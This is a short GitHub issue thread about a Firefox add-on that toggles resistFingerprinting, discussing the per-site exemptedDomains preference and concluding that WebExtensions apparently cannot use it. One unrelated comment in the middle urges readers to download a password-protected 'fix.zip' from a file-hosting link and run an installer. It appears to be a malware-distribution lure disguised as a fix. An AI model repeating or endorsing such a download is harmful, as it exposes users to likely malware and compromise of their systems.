### ISSUE TITLE
Use privacy.resistFingerprinting.exemptedDomains instead

### ISSUE THREAD

**Issue by real-or-random** [asger-finding/resistfingerprinting-toggle#150]
After https://bugzilla.mozilla.org/show_bug.cgi?id=1824235 has been solved, resistFingerprinting can be toggled per-site using the `privacy.resistFingerprinting.exemptedDomains`  property. Perhaps this add-on could be changed to use this property instead. (Mozilla plans to implement a GUI setting, but that's not done yet: https://bugzilla.mozilla.org/show_bug.cgi?id=1450398)

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by real-or-random** [comment]
Okay, apparently that's not possible with WebExtensions, see https://github.com/Aaron-P/ToggleResistFingerprinting/issues/2#issuecomment-2311074297.
